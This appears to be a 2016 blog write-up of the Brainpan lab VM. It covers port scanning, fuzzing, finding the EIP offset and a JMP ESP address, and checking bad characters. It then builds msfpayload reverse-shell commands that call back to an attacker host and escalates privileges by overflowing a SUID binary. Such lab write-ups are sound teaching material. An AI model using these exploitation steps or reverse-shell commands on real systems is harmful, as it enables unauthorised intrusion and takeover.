Tuesday 2 February 2016

Brain Pa(i)n

Now it's time for a little Buffer Overflow.

root@osboxes:~# nmap -sn 192.168.1.0/24

Nmap scan report for 192.168.1.110
Host is up (0.00039s latency).
MAC Address: 00:0C:29:10:01:C0 (VMware)
Now enumeration services...
root@osboxes:~# nmap -sV 192.168.1.110

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 20:23 GMT
Nmap scan report for 192.168.1.110
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.47%I=7%D=2/1%Time=56AFBED7%P=i686-pc-linux-gnu%r(NULL,
SF:298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x2
SF:0\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20
SF:\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\
SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\
SF:x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20\
SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|\
SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20_
SF:\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20_
SF:________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20T
SF:HE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:10:01:C0 (VMware)
Let's browse the web application
























Only trash information :-) Now turn to dirbuster (as always).









Oh! In bin directory may be some binary file?
http://192.168.1.110:10000/bin/













I think that we should run our Windows 32-bit VM and download brainpan.exe on it. Probably brainpan.exe is running on our target on 9999 port.
I am pretty sure that it will be good idea when we run brainpan.exe via Immunity Debugger.

Our Windows VM has 191.168.1.101 IP address. We have to click twice on Start button.

My own fuzzer













Result:













We know that for us the Stack has three addresses EAX, EIP and ESP. We have to find where is located EIP. We verified that 900 A's cause overflow. We have overwritten via 4x"A", so
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 900
and we have to edit our script using output from above command. Executing our script we have got following result:

 We can see, that EIP has been overwritten via 35724134
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 35724134
[*] Exact match at offset 524
Great! Now our payload will be as follow "A"*524 + "B"*4 + (900-524-4)*"C". Updated script gives following result:













Excellent! We know where we should set up JMP ESP address and where our shellcode.
root@osboxes:/usr/share/metasploit-framework/tools# ./nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp



                                                                                                
OK! We also found module without ASLR protection.

!mona find -s "\xff\xe4" -m brainpan.exe
Now, we find our JMP ESP address - 311712F3
So, our payload will be as follow: "A"*524+"\xf3\x12\x17\x31"+(900-524-4)*"C".
We have to also check "bad characters", let's generate all possible hex values.
root@osboxes:~/brainpan1# cat hex.py
dict = "abcdef0123456789"

for i in dict:
 for j in dict:
  print "\\x"+i+j
Our temporary payload : "A"*524 + "B"*4 + (900-524-4-int(len(tail)))*"\x90"+tail, where
tail:
\xaa\xab\xac\xad\xae\xaf\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xba\xbb\xbc\xbd\xbe\xbf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xca\xcb\xcc\xcd\xce\xcf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xda\xdb\xdc\xdd\xde\xdf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xea\xeb\xec\xed\xee\xef\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xfa\xfb\xfc\xfd\xfe\xff\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\x0a\x0b\x0c\x0d\x0e\x0f\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x1a\x1b\x1c\x1d\x1e\x1f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x2a\x2b\x2c\x2d\x2e\x2f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x3a\x3b\x3c\x3d\x3e\x3f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x4a\x4b\x4c\x4d\x4e\x4f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x5a\x5b\x5c\x5d\x5e\x5f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x6a\x6b\x6c\x6d\x6e\x6f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x7a\x7b\x7c\x7d\x7e\x7f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x8a\x8b\x8c\x8d\x8e\x8f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x9b\x9c\x9d\x9e\x9f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99
The first of all we should remove from our payload \x00(null byte - break everything what is next) and \x90 (No Operation - do nothing)
Afer sending this part of payload, we can see in our Immunity Debugger that, everything is fine. Now, we generate out shell code
root@osboxes:~/brainpan1# msfpayload windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"
We have to replace tail to generated buf, run
root@osboxes:~/brainpan1# nc -nlvp 4444
 and execute our script










Nice! We should generate new payload for our Linux target machine.
root@osboxes:~/brainpan1# msfpayload linux/x86/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"
Execute our escript and BOOM!










We have got limited shell!
I verified and kernel of our target is not vulnerable to known exploit :-(, but look at some interesting
puck@brainpan:/$ find / -perm -4000 -type f

[...]

/usr/sbin/pppd
/usr/local/bin/validate
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
find: `/lost+found': Permission denied

[...]
OK, let's examine /usr/local/bin/validate.                                                                                                                                                                               















Have you though about Buffer Overflow again? Executing
sudo -l
We see that we don't have "extra" privileges.  I have downloaded validate file via netcat to our machine.








We can see that we haven't got any result for JMP ESP, but we have got two records for CALL EAX. OK! Then we have expectaton that validate is vulnerable to Buffer Overflow.






Excellent! We know 200 of A's cause overflow our binary!
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 200



 Amazing! We can determine "where" is EIP register.
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 39644138
[*] Exact match at offset 116
Our payload will look as in screenshot below
 Now we can generate shell code and replace with A's. Finally we are able to use our exploit and ... BOOM!










We have changed our privileges! TRY HARDER!
















Game over!